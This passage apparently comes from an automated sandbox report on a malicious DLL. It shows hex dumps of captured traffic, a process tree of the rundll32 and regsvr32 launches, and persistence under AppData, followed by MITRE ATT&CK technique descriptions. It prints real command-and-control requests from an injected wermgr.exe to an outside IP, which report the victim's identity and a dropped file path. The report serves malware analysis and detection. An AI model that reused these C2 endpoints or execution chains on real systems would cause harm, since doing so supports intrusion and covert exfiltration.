0[sQ[l_aE03uc24v\|EENl:F=EaF;9ek1d\|{mmFNSl,H33Nr\|S5v$\|/d]&3L$+ZbVd.UX@_`}O}%Ogp1t4y9Oq4eI(c
2021-10-02 16:13:23 UTC	231	IN	Data Raw: 2a 06 32 ba 69 67 f5 15 e9 66 7b 49 29 74 96 1a a0 41 01 8a 20 a0 aa 8c 67 1a da 61 8e e3 c5 59 6f 39 6a f6 fd c3 c9 fa 85 1e 35 62 90 22 82 b9 60 70 40 d4 46 bc d6 b7 2a 92 d4 82 44 91 92 29 58 d9 57 61 f2 06 21 22 92 87 8f 4c 4e 34 2b dc ad 52 ab 88 a1 4e 3c e5 b4 63 68 90 16 26 56 7f 1e 19 db fe e6 03 eb 49 b3 40 db 8c 71 cf 34 a9 5e 35 80 05 f2 bc 2e 55 65 e4 1f 0c 49 61 98 db 00 91 8d 18 67 4d c1 e1 b1 13 96 67 2f 29 2a 5f 87 41 99 d7 e9 b1 9c 60 ea 53 bb 52 b2 d1 52 96 1a 85 2f e7 70 ca 19 26 9d 51 18 c6 03 61 49 c0 e2 71 9d 6f 30 51 b2 cd 35 b8 e2 ac f3 fb 77 e2 23 91 21 b0 cc 64 e1 29 62 0f 05 75 e8 fc 86 96 c5 f7 31 d2 4d bf c0 8f 29 92 c3 34 81 d4 0e f9 1e f2 58 9e 81 c1 1a b7 b8 ee 8a 96 5c d6 ab 66 c5 8d 96 ac b3 23 20 af 66 48 18 4f 3b a9 1f Data Ascii: 2igf{I)tA gaYo9j5b"`p@FD)XWa!"LN4+RN<ch&VI@q4^5.UeIagMg/)*_A`SRR/p&QaIqo0Q5w#!d)bu1M)4X\f# fHO;
2021-10-02 16:13:23 UTC	233	IN	Data Raw: 68 59 d6 08 21 81 04 45 8c 43 12 2a e5 90 b2 1f 9c 39 fa 3a df fc f6 fc f2 39 4d c2 18 d9 e4 95 d8 09 5c b4 5f 1c ba e3 97 c3 b1 93 ad d7 73 b1 2d 7a 61 36 d9 37 22 0d 97 04 ac 85 ed c3 0a 08 d2 31 95 66 1f 07 0d 85 3a da 22 db 62 aa f9 d9 62 dc a6 db 94 78 65 91 63 9e 14 12 aa 4e c7 8f 17 2d 99 59 b5 b2 ec 6d b4 cf 14 13 6e 5b 92 d9 8a ba d5 3c c2 38 92 57 71 2b 7c 7a 45 0c 70 46 9b 7b df 6d b0 8e e6 f1 1d 38 e8 ac f2 30 c3 0a 00 a4 ab 07 0f b2 e5 18 80 3f 76 a9 4b ea 2a b4 d2 6d de ed 0a 2f 3f 9a d3 0c bc 34 59 a5 49 00 40 c5 a4 73 fb f2 75 6f 70 31 08 18 4d 3e f6 f1 12 26 89 65 c1 48 a3 1f 41 b1 ad 8a 23 fc 5c 9e d5 df ff 00 32 26 bd 19 24 31 d6 a3 2e 5f 6c 62 79 58 ac 93 38 ca ba f4 19 c8 1a f4 3d 78 1c 72 47 2f 62 91 c3 80 ca 41 8e ec 6d aa d6 a1 ab Data Ascii: hY!EC9:9M\_s-za67"1f:"bbxecN-Ymn[<8Wq+\|zEpF{m80?vKm/?4YI@suop1M>&eHA#\2&$1._lbyX8=xrG/bAm
2021-10-02 16:13:23 UTC	234	IN	Data Raw: d1 6d 22 2e dd 55 25 31 8d bf 68 0e 57 e4 58 aa 08 57 38 d4 ac 15 54 20 7d ab 6a 60 8c a0 bb 61 cc 5d 64 0d 5b e8 a8 c7 b0 db 00 66 91 fa 66 3a dd 85 8a b2 b0 70 69 ed f8 fd 36 e2 7e 98 7d 7d 96 d7 a8 94 de 81 25 8a 3a b5 aa b0 3e 4c f0 ca 34 a3 39 64 d7 a9 61 f0 14 8e 60 f4 aa 2b b3 39 00 32 86 75 1a f5 76 66 00 c4 ab 14 00 1c af 20 3a b1 f9 1a f5 bd 61 5d bf 54 66 b8 41 e3 6f cf 1b 03 3d eb d7 4f 5e 00 3c 8c 92 c5 91 93 d6 08 b5 af f1 2e 50 ca c1 1c 84 7e d4 fd 64 5a d7 f8 88 95 96 70 9c 8c a3 2b 96 e1 d0 f7 dd eb fc 47 0c 2b 2b a9 7b 42 35 6e 44 29 ff 00 de 6b fc 44 f6 30 4a aa c5 5d 03 61 64 50 7e 3e f0 93 db 6b fc 42 8e 36 76 13 21 42 b8 44 3d 80 22 b0 df 7f 4d af 5c 4f 96 32 a4 82 37 85 78 33 11 cb 0d 60 00 e4 e3 a5 d7 ac 53 d9 a8 9a c7 38 d1 82 88 Data Ascii: m".U%1hWXW8T }j`a]d[ff:pi6~}}%:>L49da`+92uvf :a]TfAo=O^<.P~dZp+G++{B5nD)kD0J]adP~>kB6v!BD="M\O27x3`S8
2021-10-02 16:13:23 UTC	235	IN	Data Raw: 6f e6 8d 70 e1 4c 63 20 7e 5b 23 ad 6f 14 11 c4 70 af 18 cb f0 55 ca 62 33 fa 64 ae 57 f3 9c 6b dd 41 72 a7 39 7d d8 0b 66 dc 12 a6 56 5e 67 97 12 30 38 91 ad ca 3d af 69 52 e0 c4 90 c4 e9 3a 73 89 60 cb b7 91 5c 92 40 74 d6 f3 76 0d 88 43 5d ac 1a 97 37 28 10 35 24 9a 45 3e 21 38 8c a2 cc a8 ff 00 59 56 23 e5 de bf a6 22 5e 96 9c 33 50 b1 5d 6b 34 86 dd 88 a1 52 b3 24 c8 ee d1 42 1c a0 55 60 5c 6a 16 db 28 dd 43 0d ab 16 6d 5a 11 bd 8a b2 5c 70 a4 cb c9 ff 00 21 c9 60 57 5b b1 aa b5 63 35 69 25 3b bb 77 39 33 e3 96 58 e5 9d 23 32 44 a1 38 95 8d 8e 47 67 ad 6c 77 61 ac 44 13 7b d8 4d cb 7c 0b 9e e2 95 dd e4 57 61 d9 60 f8 1f 6f af fc 35 66 74 31 46 f4 b7 9b 69 62 22 19 0f 91 bd ac 93 46 10 af 4c 9c 7e cb 6a e5 45 f1 a5 5a b4 ed ab 35 96 49 13 f4 f9 4e b2 Data Ascii: opLc ~[#opUb3dWkAr9}fV^g08=iR:s`\@tvC]7(5$E>!8YV#"^3P]k4R$BU`\j(CmZ\p!`W[c5i%;w93X#2D8GglwaD{M\|Wa`o5ft1Fib"FL~jEZ5IN
2021-10-02 16:13:23 UTC	237	IN	Data Raw: 45 0b 49 38 65 91 17 0a a4 72 19 ff 00 b8 eb 75 a1 bb ed 55 a2 a6 bb e3 a3 5f 94 cc 24 f0 ac 93 c5 3b 83 04 8f 92 59 f1 21 42 c4 7e 06 28 fa 8f 61 bd 69 15 d2 fd ff 00 73 65 e4 88 14 76 ac dc e0 58 67 0f fb 26 04 1c 96 2c 0e ac cb b7 57 af 19 a3 15 b5 33 44 29 e0 f3 78 2c 4d fe b1 71 86 c2 e4 80 33 a7 b7 b3 6c f3 bc b6 d8 d3 92 27 b1 b9 5c 76 f9 3c 56 8d 56 53 0e 72 dc ce 50 20 6d 35 c8 2a cb 1d 8b bb 5b 5e af 2d 18 a3 8d 56 4e 17 8d 9c 96 e2 bf b1 64 6e db 39 f8 01 8a 7e 9e f4 bc f9 92 3b fe 08 5a 3a bb 77 00 e8 c8 9d 32 8e 18 68 9c 27 44 e8 d0 ad b6 4d 04 1b 39 9d 4e f5 b9 6f f2 4b 87 7b 0d 1d c6 8d 44 68 ea 57 f5 1f ae 27 21 75 4a e3 ec cb 51 eb df 8f 68 78 a7 75 18 05 9e 46 69 30 ec 8b c4 71 e8 12 19 72 4f 5e f2 c1 9e 39 0d aa 6e 90 55 78 9a 23 d3 43 Data Ascii: EI8eruU_$;Y!B~(aisevXg&,W3D)x,Mq3l'\v<VVSrP m5*[^-VNdn9~;Z:w2h'DM9NoK{DhW'!uJQhxuFi0qrO^9nUx#C
2021-10-02 16:13:23 UTC	238	IN	Data Raw: 54 7d a1 d2 bb 86 4d b6 dc 15 a5 19 91 ca fc 1f 25 93 a3 d7 60 d6 f5 df ab b7 3d e2 d5 a7 b7 b3 d0 5b 16 69 32 c3 04 48 92 b4 ca 8f 09 8f c6 55 42 03 ad aa ad 9a 3b 6d 3d cc 6c db 6d 28 c5 bc 4d 12 c5 e3 65 96 36 e2 c1 c9 4c a7 16 6f b6 c6 a4 5b 96 8a 3c c5 13 8d 5a cc 15 5f 8b 92 41 66 1c 93 03 90 0c c4 29 3a dd f6 eb f0 ef 0d 60 da a7 60 5b 82 5b 26 25 49 1d eb 28 71 1b 80 38 74 72 a7 20 e9 e4 43 24 11 ee 5b a8 af ed 92 43 1a f6 8c a8 59 3c 8c a8 01 20 ea 58 ec 0b 06 7e 69 3b ff 00 ae 7f 62 e1 72 32 41 c0 38 3f 40 6a 3d d6 bd 3a cf 25 10 25 8e 19 66 46 9b 8c 8b e4 c7 93 b5 66 3c 4f e7 53 c3 65 2a 2c 31 7e 98 ad 2f 92 c2 93 84 91 18 00 58 b9 c7 7d ea e6 ed 4e 0b 93 ac c9 67 90 b4 b5 df 0d 9e 68 c4 f8 b3 82 30 c4 7e 48 d1 82 0a d6 20 0e 24 90 b9 4f 1a 10 Data Ascii: T}M%`=[i2HUB;m=lm(Me6Lo[<Z_Af):``[[&%I(q8tr C$[CY< X~i;br2A8?@j=:%%fFf<OSe*,1~/X}Ngh0~H $O
2021-10-02 16:13:23 UTC	239	IN	Data Raw: c3 5b b8 97 af c0 ad fc 20 86 6b 02 2c 86 fc 00 ba 96 c6 fb b4 5c 15 a2 98 6d f3 d5 aa 69 ca 03 3a b9 b2 a9 cd d0 90 e3 fb 16 d5 79 2c 54 95 14 89 14 18 a6 2c 48 e3 92 41 19 fb c8 23 19 ec ea e4 06 78 ec c1 5d 6a fc d2 37 b7 11 e3 22 46 fd 90 32 70 d8 62 07 e7 54 2d db ab 21 81 ed c2 71 5a d2 79 70 cd 30 42 08 95 01 c1 04 06 c6 ac 0b a0 23 d9 43 5f 9a c0 67 80 ca aa 1c 32 e5 fc 6c a7 5b 86 e1 1c 37 0b d9 b0 c6 1a b0 a3 4c 72 ab 24 d2 b0 50 4e 3e 2b 9c eb 73 ad 66 23 1c d6 5a 66 af 04 51 c4 4f 1e 78 6f 24 8e 06 49 c2 02 71 d8 1a 8a 8e e0 e8 2c 56 ba ca 8d 1c f5 9f b8 a5 ad 2b 85 cc 6c 3f b0 23 38 61 a9 6b 17 4c c8 88 bc 56 43 d6 4b 80 31 92 06 ae da 2f 2f 84 3c 51 89 02 99 3e be 1c 1b ef 07 ec 63 57 76 bb 6f e2 49 24 6f 03 ac 88 e7 21 51 80 ff 00 69 07 20 Data Ascii: [ k,\mi:y,T,HA#x]j7"F2pbT-!qZyp0B#C_g2l[7Lr$PN>+sf#ZfQOxo$Iq,V+l?#8akLVCK1//<Q>cWvoI$o!Qi
2021-10-02 16:13:23 UTC	241	IN	Data Raw: 27 f2 09 d7 a9 b7 27 de 8a d7 bb 0e cf 72 0b 6d 56 b6 02 cb 24 b2 24 33 ab 3a 63 2a 81 b5 ea 6a d6 d7 74 5f 15 f9 e2 79 eb a0 8a 36 b2 5d a2 b5 e0 96 12 fc 58 78 58 b3 fc 0b 05 29 f2 d2 d4 df 2c 4c 8e fb f4 f3 aa 5d 98 21 c8 45 89 f3 09 8e 41 fe cf 8a 9e 8b 6a cf a3 3d 6b b2 59 59 78 2b c4 96 d6 fd 22 d0 2a 0b 1f 01 31 3d c6 a1 c6 62 27 20 6b 6b dc 63 46 4a f3 d5 59 3c 22 17 b7 c6 65 95 5e 36 40 86 26 05 8c 6b f7 f2 4c 0d 4f bb 19 41 78 76 cb 57 4b d7 a2 b1 07 16 e1 af 0c 48 ed 03 b7 90 aa f2 03 e8 2f 58 d5 ed a2 7d 96 da 4b 6b 69 a9 0c 53 50 ab 46 61 e2 90 c1 14 5c cc 61 03 e2 64 24 a3 16 e4 ba fe a4 b6 a1 5b 3b 4d 28 20 82 07 8f 33 cc 82 17 2d 86 25 50 29 27 5b 04 1f d4 a8 bd bd b1 6a 95 16 0b 40 a5 c3 c9 2a c9 2a 3c 72 c4 0b a3 a6 46 3b 07 52 ee 6e 6c Data Ascii: ''rmV$$3:cjt_y6]XxX),L]!EAj=kYYx+"1=b' kkcFJY<"e^6@&kLOAxvWKH/X}KkiSPFa\ad$[;M( 3-%P)'[j@**<rF;Rnl
2021-10-02 16:13:23 UTC	242	IN	Data Raw: 31 c0 66 11 8c 74 c0 92 4a 86 05 43 1c e3 4f 76 69 27 31 cb ca 72 c2 c3 82 d1 29 74 9d 63 28 e1 80 e6 87 e3 9e d4 9d 4d b2 cb 0a 47 1c 8b 56 28 2b ad 29 e4 2b c7 9c 06 36 55 2e 7f 6b 39 2a c0 e3 5b 74 22 b6 e0 93 d2 fe 91 1c d5 91 eb 2a a3 33 c9 23 87 0e 64 77 ee 25 2c 4b e4 64 eb 74 a3 bf d0 da 77 33 b4 c2 97 60 82 fd 80 a8 4c 2d 32 56 2d e5 0c c0 32 23 e7 0c 0e 8f aa b7 bb 76 f6 8a b7 e9 ed c0 c4 66 86 e1 59 aa a5 93 5f 84 ec bf 4a a2 43 86 0c 31 a7 ac bb d4 35 e0 83 69 8a f7 ea c2 90 08 9d 3c b9 77 24 a9 03 c9 de 39 ea 1d b7 7b dc 9e a1 b1 79 25 92 4a bb aa 4b 12 c2 f1 59 09 81 14 f5 8a 8f 0c aa 7f 18 2e 32 49 b5 ba ac f2 5a b3 b1 45 76 f8 48 cc af 9e 69 fa 2b 17 90 c4 a4 88 d2 5e 67 55 da 78 22 8a ad dd a3 9f 96 6c c9 94 95 89 0a 0a 71 7e 4a c4 95 04 Data Ascii: 1ftJCOvi'1r)tc(MGV(+)+6U.k9[t"3#dw%,Kdtw3`L-2V-2#vfY_JC15i<w$9{y%JKY.2IZEvHi+^gUx"lq~J
2021-10-02 16:13:23 UTC	243	IN	Data Raw: b5 25 3b f5 a4 8b 81 63 4a 7c 4a 50 c7 8c 7e af 1e fb 62 32 72 74 f1 c1 16 f1 50 55 8d 91 38 45 0d 82 b4 24 50 84 15 e2 a6 75 38 e2 0f 5a 5b 17 25 b5 02 4a 89 10 ac c2 6b 19 1e 1e 6b f8 1c 06 30 78 9e fb 1a b7 52 94 9b 95 44 97 6f da ed 0a cf 2c 17 23 68 65 2f 23 c9 27 16 7e 11 c4 d8 c8 1f 63 4a 36 cb 76 ec d6 db ef 49 34 b8 a5 3c c8 21 b3 17 10 7c 8d c2 43 90 d8 c3 2c a4 1f c8 31 5f 1b 8f a7 57 71 53 5a 11 02 38 87 c2 f3 02 af 20 09 2c 1e 74 60 02 84 91 7f 82 30 4d f5 97 d3 bb 96 f3 1e d9 79 39 25 9b 71 c1 23 c6 d2 4f 12 33 0c 3c 59 7e 4a df 43 b6 c9 02 18 13 d4 14 21 b9 40 c2 de 16 08 66 0a cf 2b e0 95 c9 c7 48 a0 80 df 47 56 ee 6e 36 66 33 ed 72 43 3b c5 55 a4 80 c5 2c 1e e6 06 0c 87 91 60 4b 05 cf 13 aa f5 b7 49 af d7 b5 7e 23 1c 8a 67 1e 34 50 be 45 Data Ascii: %;cJ\|JP~b2rtPU8E$Pu8Z[%Jkk0xRDo,#he/#'~cJ6vI4<!\|C,1_WqSZ8 ,t`0My9%q#O3<Y~JC!@f+HGVn6f3rC;U,`KI~#g4PE

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.5	49861	179.189.229.254	443	C:\Windows\System32\wermgr.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-02 16:14:04 UTC	244	OUT	GET /soc1/581804_W10017134.2A00BB06611A26D11064433A0EF770C4/5/file/ HTTP/1.1 Connection: Keep-Alive User-Agent: curl/7.78.0 Host: 179.189.229.254
2021-10-02 16:14:04 UTC	244	IN	HTTP/1.1 200 OK Server: nginx/1.14.2 Date: Sat, 02 Oct 2021 16:14:04 GMT Content-Type: application/octet-stream Content-Length: 224 Connection: close
2021-10-02 16:14:04 UTC	244	IN	Data Raw: 71 23 5a a2 7d 3d a0 2f d2 1a 13 8e 95 01 db a5 6a 69 58 b6 5f ea ad 70 57 fa 8d 49 c2 65 d6 76 e4 ac 48 14 96 33 12 6b fc a3 03 c3 3b 3d 7d f2 aa 4b 3c 71 18 df 99 32 e1 5d f6 24 9c 1f 6c 1c 37 5e cb 68 2a e4 29 81 d4 22 aa b2 64 c5 8d f2 11 ec 23 74 58 f0 63 6c d2 ff 5f 9e 0f f7 55 32 17 a7 f2 16 fe 2e 2a 14 da d8 23 a3 99 47 ad c2 26 1b 4c e1 21 3a d6 18 6a 0c 18 54 d5 87 89 69 a4 2b 22 d0 ac dc f7 ff ec b7 67 1f 7e 5c 01 57 c8 6b 2f 66 13 71 84 f2 9f 0c 4c 4e db 4c 05 96 c4 0c 92 42 1b 5f 8f c6 ee 09 0b a8 c8 fa 4e 07 cb 8e 15 57 77 17 f9 c3 af 66 28 75 8d d6 9a 54 28 50 44 a9 05 8b 95 f1 fe be 68 8d e5 99 e8 35 3f d4 a4 cd d2 d7 69 28 59 b0 5c 4f 36 b8 d3 6f Data Ascii: q#Z}=/jiX_pWIevH3k;=}K<q2]$l7^h)"d#tXcl_U2.#G&L!:jTi+"g~\Wk/fqLNLB_NWwf(uT(PDh5?i(Y\O6o

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.5	49868	179.189.229.254	443	C:\Windows\System32\wermgr.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-02 16:14:06 UTC	244	OUT	GET /soc1/581804_W10017134.2A00BB06611A26D11064433A0EF770C4/0/Windows%2010%20x64/1108/185.32.222.18/818EAD17B250A7EF3FD678E8105C4E046AE985776F1D9E89478E18E60834AFFE/DpdFlLtjjDPF77r9pp7NDP/ HTTP/1.1 Connection: Keep-Alive User-Agent: curl/7.78.0 Host: 179.189.229.254
2021-10-02 16:14:07 UTC	245	IN	HTTP/1.1 200 OK Server: nginx/1.14.2 Date: Sat, 02 Oct 2021 16:14:06 GMT Content-Type: text/plain Content-Length: 723 Connection: close
2021-10-02 16:14:07 UTC	245	IN	Data Raw: 2f 31 2f 73 6f 63 31 2f 35 38 31 38 30 34 5f 57 31 30 30 31 37 31 33 34 2e 32 41 30 30 42 42 30 36 36 31 31 41 32 36 44 31 31 30 36 34 34 33 33 41 30 45 46 37 37 30 43 34 2f 44 70 64 46 6c 4c 74 6a 6a 44 50 46 37 37 72 39 70 70 37 4e 44 50 2f 36 32 34 2f 0d 0a c7 ab f1 21 99 30 15 e1 a2 fd 9c e5 ca 3f 3a 01 01 46 ce d3 7d 71 67 90 04 a2 48 75 82 a7 da 6f 75 98 96 ab 97 91 67 1e a9 e8 13 f0 1e f5 33 00 1f f0 e6 3b 0a 40 1a 6a 24 61 52 f0 6a a3 8b fe c8 d5 56 72 a2 fc 68 ff cd 2b 12 4c cf 2e 7a a6 11 35 29 43 6f 98 6e ed 59 e4 57 8b c7 b0 ce de 55 a7 d8 ab c6 3f af ac dd cf 3f dc fe 6a c0 a9 0f 52 db b8 d9 e8 5c fd d2 cb 82 3b 3b 18 1a af 77 27 66 34 2f a4 ef 17 3b 69 7f 8d b6 41 34 67 b4 16 a5 64 59 0e 6c 01 18 f3 a1 c4 83 41 55 19 f3 80 8e 32 ce 8b 72 c3 Data Ascii: /1/soc1/581804_W10017134.2A00BB06611A26D11064433A0EF770C4/DpdFlLtjjDPF77r9pp7NDP/624/!0?:F}qgHuoug3;@j$aRjVrh+L.z5)ConYWU??jR\;;w'f4/;iA4gdYlAU2r

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.5	49871	179.189.229.254	443	C:\Windows\System32\wermgr.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-02 16:14:08 UTC	246	OUT	GET /soc1/581804_W10017134.2A00BB06611A26D11064433A0EF770C4/14/user/user/0/ HTTP/1.1 Connection: Keep-Alive User-Agent: curl/7.78.0 Host: 179.189.229.254
2021-10-02 16:14:09 UTC	246	IN	HTTP/1.1 200 OK Server: nginx/1.14.2 Date: Sat, 02 Oct 2021 16:14:08 GMT Content-Type: text/plain Content-Length: 3 Connection: close
2021-10-02 16:14:09 UTC	246	IN	Data Raw: 2f 31 2f Data Ascii: /1/

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.5	49873	179.189.229.254	443	C:\Windows\System32\wermgr.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-02 16:14:10 UTC	246	OUT	GET /soc1/581804_W10017134.2A00BB06611A26D11064433A0EF770C4/14/path/C:%5CUsers%5Cuser%5CAppData%5CRoaming%5Cfree_LogicMonitorUQG4AO%5CgsDAQzQ6FyNsks.our/0/ HTTP/1.1 Connection: Keep-Alive User-Agent: curl/7.78.0 Host: 179.189.229.254
2021-10-02 16:14:10 UTC	246	IN	HTTP/1.1 200 OK Server: nginx/1.14.2 Date: Sat, 02 Oct 2021 16:14:10 GMT Content-Type: text/plain Content-Length: 3 Connection: close
2021-10-02 16:14:10 UTC	246	IN	Data Raw: 2f 31 2f Data Ascii: /1/

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 716 Parent PID: 5864

General

Start time:	18:13:09
Start date:	02/10/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe 'C:\Users\user\Desktop\DAQzQ6FyNs.dll'
Imagebase:	0x9a0000
File size:	893440 bytes
MD5 hash:	72FCD8FB0ADC38ED9050569AD673650E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: cmd.exe PID: 6040 Parent PID: 716

General

Start time:	18:13:10
Start date:	02/10/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\DAQzQ6FyNs.dll',#1
Imagebase:	0x150000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: regsvr32.exe PID: 5468 Parent PID: 716

General

Start time:	18:13:10
Start date:	02/10/2021
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	regsvr32.exe /s C:\Users\user\Desktop\DAQzQ6FyNs.dll
Imagebase:	0xdd0000
File size:	20992 bytes
MD5 hash:	426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: rundll32.exe PID: 5684 Parent PID: 6040

General

Start time:	18:13:10
Start date:	02/10/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\DAQzQ6FyNs.dll',#1
Imagebase:	0x870000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: iexplore.exe PID: 5592 Parent PID: 716

General

Start time:	18:13:11
Start date:	02/10/2021
Path:	C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	C:\Program Files\Internet Explorer\iexplore.exe
Imagebase:	0x7ff7eca10000
File size:	823560 bytes
MD5 hash:	6465CB92B25A7BC1DF8E01D8AC5E7596
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: rundll32.exe PID: 340 Parent PID: 716

General

Start time:	18:13:11
Start date:	02/10/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\DAQzQ6FyNs.dll,DllRegisterServer
Imagebase:	0x870000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: iexplore.exe PID: 1332 Parent PID: 5592

General

Start time:	18:13:11
Start date:	02/10/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5592 CREDAT:17410 /prefetch:2
Imagebase:	0x7ff797770000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: cmd.exe PID: 7112 Parent PID: 5684

General

Start time:	18:13:48
Start date:	02/10/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe
Imagebase:	0x150000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: cmd.exe PID: 7124 Parent PID: 340

General

Start time:	18:13:49
Start date:	02/10/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe
Imagebase:	0x150000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: wermgr.exe PID: 7132 Parent PID: 5684

General

Start time:	18:13:49
Start date:	02/10/2021
Path:	C:\Windows\System32\wermgr.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wermgr.exe
Imagebase:	0x7ff779b60000
File size:	209312 bytes
MD5 hash:	FF214585BF10206E21EA8EBA202FACFD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: wermgr.exe PID: 7148 Parent PID: 340

General

Start time:	18:13:49
Start date:	02/10/2021
Path:	C:\Windows\System32\wermgr.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wermgr.exe
Imagebase:	0x7ff779b60000
File size:	209312 bytes
MD5 hash:	FF214585BF10206E21EA8EBA202FACFD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: cmd.exe PID: 2260 Parent PID: 716

General

Start time:	18:13:50
Start date:	02/10/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe
Imagebase:	0x150000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: wermgr.exe PID: 5640 Parent PID: 716

General

Start time:	18:13:51
Start date:	02/10/2021
Path:	C:\Windows\System32\wermgr.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wermgr.exe
Imagebase:	0x7ff779b60000
File size:	209312 bytes
MD5 hash:	FF214585BF10206E21EA8EBA202FACFD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: WerFault.exe PID: 5832 Parent PID: 5468

General

Start time:	18:13:51
Start date:	02/10/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 5468 -s 668
Imagebase:	0x240000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: rundll32.exe PID: 4624 Parent PID: 904

General

Start time:	18:14:18
Start date:	02/10/2021
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\rundll32.exe C:\Users\user\AppData\Roaming\free_LogicMonitorUQG4AO\gsDAQzQ6FyNsks.our,DllRegisterServer
Imagebase:	0x7ff6561e0000
File size:	69632 bytes
MD5 hash:	73C519F050C20580F8A62C849D49215A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

